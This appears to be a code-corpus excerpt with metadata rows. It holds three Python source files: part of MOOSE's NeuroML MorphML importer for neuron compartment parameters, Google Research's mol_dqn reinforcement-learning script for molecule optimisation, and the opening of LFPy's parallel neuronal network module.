elif parametername in ['depth']: # has to be type Ion Concentration!
self.set_group_compartment_param(cell, cellname, parameter,\
'thick', self.length_factor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
elif parametername in ['v_reset']:
self.set_group_compartment_param(cell, cellname, parameter,\
'v_reset', Efactor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
elif parametername in ['threshold']:
self.set_group_compartment_param(cell, cellname, parameter,\
'threshold', Efactor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
elif parametername in ['t_refrac']:
self.set_group_compartment_param(cell, cellname, parameter,\
't_refrac', Tfactor*float(parameter.attrib["value"]),\
self.bio, mechanismname)
else:
_logger.warning(["Yo programmer of MorphML import! You didn't"
, " implement parameter %s " % parametername
, " in mechanism %s " % mechanismname ]
)
## variable parameters:
## varying with:
## p, g, L, len, dia
## p: path distance from soma, measured along dendrite, in metres.
## g: geometrical distance from soma, in metres.
## L: electrotonic distance (# of lambdas) from soma, along dend. No units.
## len: length of compartment, in metres.
## dia: for diameter of compartment, in metres.
var_params = mechanism.findall(".//{"+self.bio+"}variable_parameter")
if len(var_params) > 0:
## if variable params are present
## and use MOOSE to apply the variable formula
for parameter in var_params:
parametername = parameter.attrib['name']
cablegroupstr4moose = ""
## the neuroml spec says there should be a single group in a variable_parameter
## of course user can always have multiple variable_parameter tags,
## if user wants multiple groups conforming to neuroml specs.
group = parameter.find(".//{"+self.bio+"}group")
cablegroupname = group.text
if cablegroupname == 'all':
cablegroupstr4moose = "#"
else:
for cableid in self.cablegroupsDict[cablegroupname]:
for compartment in self.cellDictByCableId[cellname][1][cableid]:
cablegroupstr4moose += "#"+compartment.name+"#,"
if cablegroupstr4moose[-1] == ',':
cablegroupstr4moose = cablegroupstr4moose[:-1] # remove last comma
inhomo_value = parameter.find(".//{"+self.bio+"}inhomogeneous_value")
inhomo_value_name = inhomo_value.attrib['param_name']
inhomo_value_value = inhomo_value.attrib['value']
if parametername == 'gmax':
inhomo_eqn = '('+inhomo_value_value+')*'+str(Gfactor)
# careful about physiol vs SI units
else:
inhomo_eqn = inhomo_value_value
_logger.warning('Physiol. vs SI units translation not'
' implemented for parameter '+parametername+
'in channel '+mechanismname)+'. Use SI units'
'or ask for implementation.'
chan_distrib.extend((mechanismname,cablegroupstr4moose,parametername,inhomo_eqn,""))
# use extend, not append, moose wants it this way
## get mooose to parse the variable parameter gmax channel distributions
#pu.info("Some channel parameters distributed as per "+str(chan_distrib))
moosecell.channelDistribution = chan_distrib
#### Connect the Ca pools and channels
#### Am connecting these at the very end so that all channels and pools have been created
#### Note: this function is in moose.utils not moose.neuroml.utils !
for compartment_list in self.cellDictByCableId[cellname][1].values():
moose_utils.connect_CaConc(compartment_list,\
self.temperature+neuroml_utils.ZeroCKelvin) # temperature should be in Kelvin for Nernst
##########################################################
#### load connectivity / synapses into the compartments
connectivity = cell.find(".//{"+self.neuroml+"}connectivity")
if connectivity is not None:
for potential_syn_loc in cell.findall(".//{"+self.nml+"}potential_syn_loc"):
if 'synapse_direction' in potential_syn_loc.attrib:
if potential_syn_loc.attrib['synapse_direction'] in ['post','preAndOrPost']:
self.set_group_compartment_param(cell, cellname, potential_syn_loc,\
'synapse_type', potential_syn_loc.attrib['synapse_type'],\
self.nml, mechanismname='synapse')
if potential_syn_loc.attrib['synapse_direction'] in ['pre','preAndOrPost']:
self.set_group_compartment_param(cell, cellname, potential_syn_loc,\
'spikegen_type', potential_syn_loc.attrib['synapse_type'],\
self.nml, mechanismname='spikegen')
##########################################################
#### annotate each compartment with the cablegroups it belongs to
self.cableDict = {}
for cablegroupname in self.cablegroupsDict:
comp_list = []
for cableid in self.cablegroupsDict[cablegroupname]:
for compartment in self.cellDictByCableId[cellname][1][cableid]:
cableStringPath = compartment.path+'/cable_groups'
cableString = moose.Mstring(cableStringPath)
if cableString.value == '':
cableString.value += cablegroupname
else:
cableString.value += ',' + cablegroupname
comp_list.append(compartment.name)
self.cableDict[cablegroupname] = comp_list
_logger.info("Finished loading into library, cell: %s " % cellname)
return {cellname:(self.segDict,self.cableDict)}
def set_group_compartment_param(self, cell, cellname, parameter,\
name, value, grouptype, mechanismname=None):
"""
Find the compartments that belong to the cablegroups refered to
for this parameter and set_compartment_param.
"""
for group in parameter.findall(".//{"+grouptype+"}group"):
cablegroupname = group.text
if cablegroupname == 'all':
for compartment_list in self.cellDictByCableId[cellname][1].values():
for compartment in compartment_list:
self.set_compartment_param(compartment,name,value,mechanismname)
else:
for cableid in self.cablegroupsDict[cablegroupname]:
for compartment in self.cellDictByCableId[cellname][1][cableid]:
self.set_compartment_param(compartment,name,value,mechanismname)
def set_compartment_param(self, compartment, name, value, mechanismname):
""" Set the param for the compartment depending on name and mechanismname. """
if name == 'CM':
compartment.Cm = value*math.pi*compartment.diameter*compartment.length
elif name == 'RM':
compartment.Rm = value/(math.pi*compartment.diameter*compartment.length)
elif name == 'RA':
compartment.Ra = value*compartment.length/(math.pi*(compartment.diameter/2.0)**2)
elif name == 'Em':
compartment.Em = value
elif name == 'initVm':
compartment.initVm = value
elif name == 'inject':
# this reader converts to SI
_logger.info("Comparment %s inject %s A." % (compartment.name, value))
compartment.inject = value
elif name == 'v_reset':
compartment.vReset = value # compartment is a moose.LIF instance (intfire)
elif name == 'threshold':
compartment.thresh = value # compartment is a moose.LIF instance (intfire)
elif name == 't_refrac':
compartment.refractoryPeriod = value # compartment is a moose.LIF instance (intfire)
elif name == 'g_refrac':
_logger.info("SORRY, current moose.LIF doesn't support g_refrac.")
elif mechanismname == 'synapse': # synapse being added to the compartment
## these are potential locations, we do not actually make synapses,
## unless the user has explicitly asked for it
if self.createPotentialSynapses:
syn_name = value
if not moose.exists(compartment.path+'/'+syn_name):
make_new_synapse(syn_name, compartment, syn_name, self.nml_params)
## I assume below that compartment name has _segid at its end
segid = compartment.name.split('_')[-1] # get segment id from compartment name
self.segDict[segid][5].append(value)
elif mechanismname == 'spikegen': # spikegen being added to the compartment
## these are potential locations, we do not actually make the spikegens.
## spikegens for different synapses can have different thresholds,
## hence include synapse_type in its name
## value contains name of synapse i.e. synapse_type
#spikegen = moose.SpikeGen(compartment.path+'/'+value+'_spikegen')
#moose.connect(compartment,"VmSrc",spikegen,"Vm")
pass
## previous were mechanism that don't need a ChannelML definition
## including integrate_and_fire (I ignore the ChannelML definition)
## thus integrate_and_fire mechanism default values cannot be used
## i.e. nothing needed in /library, but below mechanisms need.
elif mechanismname is not None:
## if mechanism is not present in compartment, deep copy from library
## all mechanisms have been loaded into the library earlier
if not moose.exists(compartment.path+'/'+mechanismname):
neutralObj = moose.element("/library/"+mechanismname) # gives error if not present
if 'CaConc' == neutralObj.className: # Ion concentration pool
libcaconc = moose.CaConc("/library/"+mechanismname)
## deep copies the library caconc under the compartment
caconc = moose.copy(libcaconc,compartment,mechanismname)
caconc = moose.CaConc(caconc)
## CaConc connections are made later using connect_CaConc()
## Later, when calling connect_CaConc,
## B is set for caconc based on thickness of Ca shell and compartment l and dia
## OR based on the Mstring phi under CaConc path.
channel = None
elif 'HHChannel2D' == neutralObj.className : ## HHChannel2D
libchannel = moose.HHChannel2D("/library/"+mechanismname)
## deep copies the library channel under the compartment
channel = moose.copy(libchannel,compartment,mechanismname)
channel = moose.HHChannel2D(channel)
moose.connect(channel,'channel',compartment,'channel')
elif 'HHChannel' == neutralObj.className : ## HHChannel
libchannel = moose.HHChannel("/library/"+mechanismname)
## deep copies the library channel under the compartment
channel = moose.copy(libchannel,compartment,mechanismname)
channel = moose.HHChannel(channel)
moose.connect(channel,'channel',compartment,'channel')
## if mechanism is present in compartment, just wrap it
else:
neutralObj = moose.element(compartment.path+'/'+mechanismname)
if 'CaConc' == neutralObj.className: # Ion concentration pool
caconc = moose.CaConc(compartment.path+'/'+mechanismname) # wraps existing channel
channel = None
elif 'HHChannel2D' == neutralObj.className : ## HHChannel2D
channel = moose.HHChannel2D(compartment.path+'/'+mechanismname) # wraps existing channel
elif 'HHChannel' == neutralObj.className : ## HHChannel
channel = moose.HHChannel(compartment.path+'/'+mechanismname) # wraps existing channel
if name == 'Gbar':
if channel is None: # if CaConc, neuroConstruct uses gbar for thickness or phi
## If child Mstring 'phi' is present, set gbar as phi
## BUT, value has been multiplied by Gfactor as a Gbar,
## SI or physiological not known here,
## ignoring Gbar for CaConc, instead of passing units here
child = moose_utils.get_child_Mstring(caconc,'phi')
if child is not None:
#child.value = value
pass
else:
#caconc.thick = value
pass
else: # if ion channel, usual Gbar
channel.Gbar = value*math.pi*compartment.diameter*compartment.length
elif name == 'Ek':
channel.Ek = value
elif name == 'thick': # thick seems to be NEURON's extension to NeuroML level 2.
caconc.thick = value ## JUST THIS WILL NOT DO - HAVE TO SET B based on this thick!
## Later, when calling connect_CaConc,
## B is set for caconc based on thickness of Ca shell and compartment l and dia.
## OR based on the Mstring phi under CaConc path.
if neuroml_utils.neuroml_debug:
_logger.info("Setting %s for comparment %s to %s" % (name, compartment.path, value))
| upibhalla/moose-core | python/moose/neuroml/MorphML.py | Python | gpl-3.0 | 40,773 | [
"MOOSE",
"NEURON"
] | 11fa136505fe0c251b2c49924a7383cf067e3769e39aa184adf0be21a7dec604 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Executor for deep Q network models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import json
import os
import time
from absl import app
from absl import flags
from absl import logging
from baselines.common import schedules
from baselines.deepq import replay_buffer
import numpy as np
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem import AllChem
from rdkit.Chem import Descriptors
from rdkit.Chem import QED
from six.moves import range
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import gfile
from mol_dqn.chemgraph.dqn import deep_q_networks
from mol_dqn.chemgraph.dqn import molecules as molecules_mdp
from mol_dqn.chemgraph.dqn.py import molecules
from mol_dqn.chemgraph.dqn.tensorflow_core import core
flags.DEFINE_string('model_dir',
'/namespace/gas/primary/zzp/dqn/r=3/exp2_bs_dqn',
'The directory to save data to.')
flags.DEFINE_string('target_molecule', 'C1CCC2CCCCC2C1',
'The SMILES string of the target molecule.')
flags.DEFINE_string('start_molecule', None,
'The SMILES string of the start molecule.')
flags.DEFINE_float(
'similarity_weight', 0.5,
'The weight of the similarity score in the reward function.')
flags.DEFINE_float('target_weight', 493.60,
'The target molecular weight of the molecule.')
flags.DEFINE_string('hparams', None, 'Filename for serialized HParams.')
flags.DEFINE_boolean('multi_objective', False,
'Whether to run multi objective DQN.')
FLAGS = flags.FLAGS
class TargetWeightMolecule(molecules_mdp.Molecule):
"""Defines the subclass of a molecule MDP with a target molecular weight."""
def __init__(self, target_weight, **kwargs):
"""Initializes the class.
Args:
target_weight: Float. the target molecular weight.
**kwargs: The keyword arguments passed to the parent class.
"""
super(TargetWeightMolecule, self).__init__(**kwargs)
self.target_weight = target_weight
def _reward(self):
"""Calculates the reward of the current state.
The reward is defined as the negative l1 distance between the current
molecular weight and target molecular weight range.
Returns:
Float. The negative distance.
"""
molecule = Chem.MolFromSmiles(self._state)
if molecule is None:
return -self.target_weight**2
lower, upper = self.target_weight - 25, self.target_weight + 25
mw = Descriptors.MolWt(molecule)
if lower <= mw <= upper:
return 1
return -min(abs(lower - mw), abs(upper - mw))
class MultiObjectiveRewardMolecule(molecules_mdp.Molecule):
"""Defines the subclass of generating a molecule with a specific reward.
The reward is defined as a 1-D vector with 2 entries: similarity and QED
reward = (similarity_score, qed_score)
"""
def __init__(self, target_molecule, **kwargs):
"""Initializes the class.
Args:
target_molecule: SMILES string. the target molecule against which we
calculate the similarity.
**kwargs: The keyword arguments passed to the parent class.
"""
super(MultiObjectiveRewardMolecule, self).__init__(**kwargs)
target_molecule = Chem.MolFromSmiles(target_molecule)
self._target_mol_fingerprint = self.get_fingerprint(target_molecule)
self._target_mol_scaffold = molecules.get_scaffold(target_molecule)
self.reward_dim = 2
def get_fingerprint(self, molecule):
"""Gets the morgan fingerprint of the target molecule.
Args:
molecule: Chem.Mol. The current molecule.
Returns:
rdkit.ExplicitBitVect. The fingerprint of the target.
"""
return AllChem.GetMorganFingerprint(molecule, radius=2)
def get_similarity(self, smiles):
"""Gets the similarity between the current molecule and the target molecule.
Args:
smiles: String. The SMILES string for the current molecule.
Returns:
Float. The Tanimoto similarity.
"""
structure = Chem.MolFromSmiles(smiles)
if structure is None:
return 0.0
fingerprint_structure = self.get_fingerprint(structure)
return DataStructs.TanimotoSimilarity(self._target_mol_fingerprint,
fingerprint_structure)
def _reward(self):
"""Calculates the reward of the current state.
The reward is defined as a tuple of the similarity and QED value.
Returns:
A tuple of the similarity and qed value
"""
# calculate similarity.
# if the current molecule does not contain the scaffold of the target,
# similarity is zero.
if self._state is None:
return 0.0, 0.0
mol = Chem.MolFromSmiles(self._state)
if mol is None:
return 0.0, 0.0
if molecules.contains_scaffold(mol, self._target_mol_scaffold):
similarity_score = self.get_similarity(self._state)
else:
similarity_score = 0.0
# calculate QED
qed_value = QED.qed(mol)
return similarity_score, qed_value
# TODO(zzp): use the tf.estimator interface.
def run_training(hparams, environment, dqn):
"""Runs the training procedure.
Briefly, the agent runs the action network to get an action to take in
the environment. The state transition and reward are stored in the memory.
Periodically the agent samples a batch of samples from the memory to
update(train) its Q network. Note that the Q network and the action network
share the same set of parameters, so the action network is also updated by
the samples of (state, action, next_state, reward) batches.
Args:
hparams: tf.contrib.training.HParams. The hyper parameters of the model.
environment: molecules.Molecule. The environment to run on.
dqn: An instance of the DeepQNetwork class.
Returns:
None
"""
summary_writer = tf.summary.FileWriter(FLAGS.model_dir)
tf.reset_default_graph()
with tf.Session() as sess:
dqn.build()
model_saver = tf.train.Saver(max_to_keep=hparams.max_num_checkpoints)
# The schedule for the epsilon in epsilon greedy policy.
exploration = schedules.PiecewiseSchedule(
[(0, 1.0), (int(hparams.num_episodes / 2), 0.1),
(hparams.num_episodes, 0.01)],
outside_value=0.01)
if hparams.prioritized:
memory = replay_buffer.PrioritizedReplayBuffer(hparams.replay_buffer_size,
hparams.prioritized_alpha)
beta_schedule = schedules.LinearSchedule(
hparams.num_episodes, initial_p=hparams.prioritized_beta, final_p=0)
else:
memory = replay_buffer.ReplayBuffer(hparams.replay_buffer_size)
beta_schedule = None
sess.run(tf.global_variables_initializer())
sess.run(dqn.update_op)
global_step = 0
for episode in range(hparams.num_episodes):
global_step = _episode(
environment=environment,
dqn=dqn,
memory=memory,
episode=episode,
global_step=global_step,
hparams=hparams,
summary_writer=summary_writer,
exploration=exploration,
beta_schedule=beta_schedule)
if (episode + 1) % hparams.update_frequency == 0:
sess.run(dqn.update_op)
if (episode + 1) % hparams.save_frequency == 0:
model_saver.save(
sess,
os.path.join(FLAGS.model_dir, 'ckpt'),
global_step=global_step)
def _episode(environment, dqn, memory, episode, global_step, hparams,
summary_writer, exploration, beta_schedule):
"""Runs a single episode.
Args:
environment: molecules.Molecule; the environment to run on.
dqn: DeepQNetwork used for estimating rewards.
memory: ReplayBuffer used to store observations and rewards.
episode: Integer episode number.
global_step: Integer global step; the total number of steps across all
episodes.
hparams: HParams.
summary_writer: FileWriter used for writing Summary protos.
exploration: Schedule used for exploration in the environment.
beta_schedule: Schedule used for prioritized replay buffers.
Returns:
Updated global_step.
"""
episode_start_time = time.time()
environment.initialize()
if hparams.num_bootstrap_heads:
head = np.random.randint(hparams.num_bootstrap_heads)
else:
head = 0
for step in range(hparams.max_steps_per_episode):
result = _step(
environment=environment,
dqn=dqn,
memory=memory,
episode=episode,
hparams=hparams,
exploration=exploration,
head=head)
if step == hparams.max_steps_per_episode - 1:
episode_summary = dqn.log_result(result.state, result.reward)
summary_writer.add_summary(episode_summary, global_step)
logging.info('Episode %d/%d took %gs', episode + 1, hparams.num_episodes,
time.time() - episode_start_time)
logging.info('SMILES: %s\n', result.state)
# Use %s since reward can be a tuple or a float number.
logging.info('The reward is: %s', str(result.reward))
if (episode > min(50, hparams.num_episodes / 10)) and (
global_step % hparams.learning_frequency == 0):
if hparams.prioritized:
(state_t, _, reward_t, state_tp1, done_mask, weight,
indices) = memory.sample(
hparams.batch_size, beta=beta_schedule.value(episode))
else:
(state_t, _, reward_t, state_tp1,
done_mask) = memory.sample(hparams.batch_size)
weight = np.ones([reward_t.shape[0]])
# np.atleast_2d cannot be used here because a new dimension will
# be always added in the front and there is no way of changing this.
if reward_t.ndim == 1:
reward_t = np.expand_dims(reward_t, axis=1)
td_error, error_summary, _ = dqn.train(
states=state_t,
rewards=reward_t,
next_states=state_tp1,
done=np.expand_dims(done_mask, axis=1),
weight=np.expand_dims(weight, axis=1))
summary_writer.add_summary(error_summary, global_step)
logging.info('Current TD error: %.4f', np.mean(np.abs(td_error)))
if hparams.prioritized:
memory.update_priorities(
indices,
np.abs(np.squeeze(td_error) + hparams.prioritized_epsilon).tolist())
global_step += 1
return global_step
def _step(environment, dqn, memory, episode, hparams, exploration, head):
"""Runs a single step within an episode.
Args:
environment: molecules.Molecule; the environment to run on.
dqn: DeepQNetwork used for estimating rewards.
memory: ReplayBuffer used to store observations and rewards.
episode: Integer episode number.
hparams: HParams.
exploration: Schedule used for exploration in the environment.
head: Integer index of the DeepQNetwork head to use.
Returns:
molecules.Result object containing the result of the step.
"""
# Compute the encoding for each valid action from the current state.
steps_left = hparams.max_steps_per_episode - environment.num_steps_taken
valid_actions = list(environment.get_valid_actions())
observations = np.vstack([
np.append(deep_q_networks.get_fingerprint(act, hparams), steps_left)
for act in valid_actions
])
action = valid_actions[dqn.get_action(
observations, head=head, update_epsilon=exploration.value(episode))]
action_t_fingerprint = np.append(
deep_q_networks.get_fingerprint(action, hparams), steps_left)
result = environment.step(action)
steps_left = hparams.max_steps_per_episode - environment.num_steps_taken
action_fingerprints = np.vstack([
np.append(deep_q_networks.get_fingerprint(act, hparams), steps_left)
for act in environment.get_valid_actions()
])
# we store the fingerprint of the action in obs_t so action
# does not matter here.
memory.add(
obs_t=action_t_fingerprint,
action=0,
reward=result.reward,
obs_tp1=action_fingerprints,
done=float(result.terminated))
return result
def run_dqn(multi_objective=False):
"""Run the training of Deep Q Network algorithm.
Args:
multi_objective: Boolean. Whether to run the multiobjective DQN.
"""
if FLAGS.hparams is not None:
with gfile.Open(FLAGS.hparams, 'r') as f:
hparams = deep_q_networks.get_hparams(**json.load(f))
else:
hparams = deep_q_networks.get_hparams()
logging.info(
'HParams:\n%s', '\n'.join([
'\t%s: %s' % (key, value)
for key, value in sorted(hparams.values().items())
]))
# TODO(zzp): merge single objective DQN to multi objective DQN.
if multi_objective:
environment = MultiObjectiveRewardMolecule(
target_molecule=FLAGS.target_molecule,
atom_types=set(hparams.atom_types),
init_mol=FLAGS.start_molecule,
allow_removal=hparams.allow_removal,
allow_no_modification=hparams.allow_no_modification,
allow_bonds_between_rings=False,
allowed_ring_sizes={3, 4, 5, 6},
max_steps=hparams.max_steps_per_episode)
dqn = deep_q_networks.MultiObjectiveDeepQNetwork(
objective_weight=np.array([[FLAGS.similarity_weight],
[1 - FLAGS.similarity_weight]]),
input_shape=(hparams.batch_size, hparams.fingerprint_length + 1),
q_fn=functools.partial(
deep_q_networks.multi_layer_model, hparams=hparams),
optimizer=hparams.optimizer,
grad_clipping=hparams.grad_clipping,
num_bootstrap_heads=hparams.num_bootstrap_heads,
gamma=hparams.gamma,
epsilon=1.0)
else:
environment = TargetWeightMolecule(
target_weight=FLAGS.target_weight,
atom_types=set(hparams.atom_types),
init_mol=FLAGS.start_molecule,
allow_removal=hparams.allow_removal,
allow_no_modification=hparams.allow_no_modification,
allow_bonds_between_rings=hparams.allow_bonds_between_rings,
allowed_ring_sizes=set(hparams.allowed_ring_sizes),
max_steps=hparams.max_steps_per_episode)
dqn = deep_q_networks.DeepQNetwork(
input_shape=(hparams.batch_size, hparams.fingerprint_length + 1),
q_fn=functools.partial(
deep_q_networks.multi_layer_model, hparams=hparams),
optimizer=hparams.optimizer,
grad_clipping=hparams.grad_clipping,
num_bootstrap_heads=hparams.num_bootstrap_heads,
gamma=hparams.gamma,
epsilon=1.0)
run_training(
hparams=hparams,
environment=environment,
dqn=dqn,
)
core.write_hparams(hparams, os.path.join(FLAGS.model_dir, 'config.json'))
def main(argv):
del argv # unused.
run_dqn(FLAGS.multi_objective)
if __name__ == '__main__':
app.run(main)
| google-research/google-research | mol_dqn/chemgraph/dqn/run_dqn.py | Python | apache-2.0 | 15,386 | [
"RDKit"
] | e96467655a139cfeb2f320fe14095f7e40d48673a46bd402141d19bd9fa45c23 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Defines classes and methods used for recurrent neuronal networks.
Copyright (C) 2012 Computational Neuroscience Group, NMBU.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
"""
import numpy as np
import os
import scipy.stats as stats
import h5py
from mpi4py import MPI
import neuron
from neuron import units
from .templatecell import TemplateCell
import scipy.sparse as ss
from warnings import warn
# set up MPI environment
COMM = MPI.COMM_WORLD
SIZE = COMM.Get_size()
RANK = COMM.Get_rank()
def flattenlist(lst):
return [item for sublist in lst for item in sublist]
##########################################################################
# NetworkCell class that has a create_synapse method that
# creates a synapse on the target cell, and a create_spike_detector method that
# allows for connecting to a synapse on a target cell. All other methods and
# attributes are inherited from the standard LFPy.TemplateCell class
##########################################################################
class NetworkCell(TemplateCell):
"""
Similar to `LFPy.TemplateCell` with the addition of some attributes and
methods allowing for spike communication between parallel RANKs.
This class allow using NEURON templates with some limitations.
This takes all the same parameters as the Cell class, but requires three
more template related parameters
Parameters
----------
morphology: str
path to morphology file
templatefile: str
File with cell template definition(s)
templatename: str
Cell template-name used for this cell object
templateargs: str
Parameters provided to template-definition
v_init: float
Initial membrane potential. Default to -65.
Ra: float
axial resistance. Defaults to 150.
cm: float
membrane capacitance. Defaults to 1.0
passive: bool
Passive mechanisms are initialized if True. Defaults to True
passive_parameters: dict
parameter dictionary with values for the passive membrane mechanism in
NEURON ('pas'). The dictionary must contain keys 'g_pas' and 'e_pas',
like the default: passive_parameters=dict(g_pas=0.001, e_pas=-70)
extracellular: bool
switch for NEURON's extracellular mechanism. Defaults to False
dt: float
Simulation time step. Defaults to 2**-4
tstart: float
initialization time for simulation <= 0 ms. Defaults to 0.
tstop: float
stop time for simulation > 0 ms. Defaults to 100.
nsegs_method: 'lambda100' or 'lambda_f' or 'fixed_length' or None
nseg rule, used by NEURON to determine number of compartments.
Defaults to 'lambda100'
max_nsegs_length: float or None
max segment length for method 'fixed_length'. Defaults to None
lambda_f: int
AC frequency for method 'lambda_f'. Defaults to 100
d_lambda: float
parameter for d_lambda rule. Defaults to 0.1
delete_sections: bool
delete pre-existing section-references. Defaults to True
custom_code: list or None
list of model-specific code files ([.py/.hoc]). Defaults to None
custom_fun: list or None
list of model-specific functions with args. Defaults to None
custom_fun_args: list or None
list of args passed to custom_fun functions. Defaults to None
pt3d: bool
use pt3d-info of the cell geometries switch. Defaults to False
celsius: float or None
Temperature in celsius. If nothing is specified here
or in custom code it is 6.3 celcius
verbose: bool
verbose output switch. Defaults to False
Examples
--------
>>> import LFPy
>>> cellParameters = {
>>> 'morphology': '<path to morphology.hoc>',
>>> 'templatefile': '<path to template_file.hoc>',
>>> 'templatename': 'templatename',
>>> 'templateargs': None,
>>> 'v_init': -65,
>>> 'cm': 1.0,
>>> 'Ra': 150,
>>> 'passive': True,
>>> 'passive_parameters': {'g_pas': 0.001, 'e_pas': -65.},
>>> 'dt': 2**-3,
>>> 'tstart': 0,
>>> 'tstop': 50,
>>> }
>>> cell = LFPy.NetworkCell(**cellParameters)
>>> cell.simulate()
See also
--------
Cell
TemplateCell
"""
def __init__(self, **args):
super().__init__(**args)
# create list netconlist for spike detecting NetCon object(s)
self._hoc_sd_netconlist = neuron.h.List()
# create list of recording device for action potentials
self.spikes = []
# create list of random number generators used with synapse model
self.rng_list = []
# create separate list for networked synapses
self.netconsynapses = []
# create recording device for membrane voltage
self.somav = neuron.h.Vector()
for sec in self.somalist:
self.somav.record(sec(0.5)._ref_v)
def create_synapse(self, cell, sec, x=0.5, syntype=neuron.h.ExpSyn,
synparams=dict(tau=2., e=0.),
assert_syn_values=False):
"""
Create synapse object of type syntype on sec(x) of cell and
append to list cell.netconsynapses
TODO: Use LFPy.Synapse class if possible.
Parameters
----------
cell: object
instantiation of class NetworkCell or similar
sec: neuron.h.Section object,
section reference on cell
x: float in [0, 1],
relative position along section
syntype: hoc.HocObject
NEURON synapse model reference, e.g., neuron.h.ExpSyn
synparams: dict
parameters for syntype, e.g., for neuron.h.ExpSyn we have:
tau: float, synapse time constant
e: float, synapse reversal potential
assert_syn_values: bool
if True, raise AssertionError if synapse attribute values do not
match the values in the synparams dictionary
Raises
------
AssertionError
"""
# create a synapse object on the target cell
syn = syntype(x, sec=sec)
if hasattr(syn, 'setRNG'):
# Create the random number generator for the synapse
rng = neuron.h.Random()
# not sure if this is how it is supposed to be set up...
rng.MCellRan4(
np.random.randint(
0,
2**32 - 1),
np.random.randint(
0,
2**32 - 1))
rng.uniform(0, 1)
# used for e.g., stochastic synapse mechanisms (cf. BBP
# microcircuit portal files)
syn.setRNG(rng)
cell.rng_list.append(rng) # must store ref to rng object
cell.netconsynapses.append(syntype(x, sec=sec))
for key, value in synparams.items():
setattr(cell.netconsynapses[-1], key, value)
# check that synapses are parameterized correctly
if assert_syn_values:
try:
np.testing.assert_almost_equal(
getattr(cell.netconsynapses[-1], key), value)
except AssertionError:
raise AssertionError('{} = {} != {}'.format(
key, getattr(cell.netconsynapses[-1], key), value))
def create_spike_detector(self, target=None, threshold=-10.,
weight=0.0, delay=0.0):
"""
Create spike-detecting NetCon object attached to the cell's soma
midpoint, but this could be extended to having multiple spike-detection
sites. The NetCon object created is attached to the cell's
`_hoc_sd_netconlist` attribute, and will be used by the Network class
when creating connections between all presynaptic cells and
postsynaptic cells on each local RANK.
Parameters
----------
target: None (default) or a NEURON point process
threshold: float
spike detection threshold
weight: float
connection weight (not used unless target is a point process)
delay: float
connection delay (not used unless target is a point process)
"""
# create new NetCon objects for the connections. Activation times will
# be triggered on the somatic voltage with a given threshold.
for sec in self.somalist:
self._hoc_sd_netconlist.append(neuron.h.NetCon(sec(0.5)._ref_v,
target,
sec=sec))
self._hoc_sd_netconlist[-1].threshold = threshold
self._hoc_sd_netconlist[-1].weight[0] = weight
self._hoc_sd_netconlist[-1].delay = delay
class DummyCell(object):
def __init__(self, totnsegs=0,
x=None,
y=None,
z=None,
d=None,
area=None,
length=None,
somainds=None):
"""
Dummy Cell object initialized with all attributes needed for LFP
calculations using the LFPy.RecExtElectrode class and methods.
This cell can be imagined as one "super" cell containing transmembrane
currents generated by all NetworkCell segments on this RANK at once.
Parameters
----------
totnsegs: int
total number of segments
x, y, z: ndarray
arrays of shape (totnsegs, 2) with (x,y,z) coordinates of start
and end points of segments in units of (um)
d: ndarray
array of length totnsegs with segment diameters
area: ndarray
array of segment surface areas
length: ndarray
array of segment lengths
"""
# set attributes
self.totnsegs = totnsegs
self.x = x if x is not None else np.array([])
self.y = y if y is not None else np.array([])
self.z = z if z is not None else np.array([])
self.d = d if d is not None else np.array([])
self.area = area if area is not None else np.array([])
self.length = length if area is not None else np.array([])
self.somainds = somainds if somainds is not None else np.array([])
def get_idx(self, section="soma"):
if section == "soma":
return self.somainds
else:
raise ValueError('section argument must be "soma"')
class NetworkPopulation(object):
"""
NetworkPopulation class representing a group of Cell objects
distributed across RANKs.
Parameters
----------
CWD: path or None
Current working directory
CELLPATH: path or None
Relative path from CWD to source files for cell model
(morphology, hoc routines etc.)
first_gid: int
The global identifier of the first cell created in this population
instance. The first_gid in the first population created should be 0
and cannot exist in previously created NetworkPopulation instances
Cell: class
class defining a Cell object, see class NetworkCell above
POP_SIZE: int
number of cells in population
name: str
population name reference
cell_args: dict
keys and values for Cell object
pop_args: dict
keys and values for Network.draw_rand_pos assigning cell positions
rotation_arg: dict
default cell rotations around x and y axis on the form
{ 'x': np.pi/2, 'y': 0 }. Can only have the keys 'x' and 'y'.
Cells are randomly rotated around z-axis using the
Cell.set_rotation() method.
OUTPUTPATH: str
path to output file destination
"""
def __init__(self, CWD=None, CELLPATH=None, first_gid=0, Cell=NetworkCell,
POP_SIZE=4, name='L5PC',
cell_args=None, pop_args=None,
rotation_args=None,
OUTPUTPATH='example_parallel_network'):
# set class attributes
self.CWD = CWD
self.CELLPATH = CELLPATH
self.first_gid = first_gid
self.Cell = Cell
self.POP_SIZE = POP_SIZE
self.name = name
self.cell_args = cell_args if cell_args is not None else dict()
self.pop_args = pop_args if pop_args is not None else dict()
self.rotation_args = rotation_args if rotation_args is not None \
else dict()
self.OUTPUTPATH = OUTPUTPATH
# create folder for output if it does not exist
if RANK == 0:
if not os.path.isdir(OUTPUTPATH):
os.mkdir(OUTPUTPATH)
COMM.Barrier()
# container of Vector objects used to record times of action potentials
self.spike_vectors = []
# set up population of cells on this RANK
self.gids = [
(i +
first_gid) for i in range(POP_SIZE) if (
i +
first_gid) %
SIZE == RANK]
# we have to enter the cell's corresponding file directory to
# create cell because how EPFL set their code up
if CWD is not None:
os.chdir(os.path.join(CWD, CELLPATH, self.name))
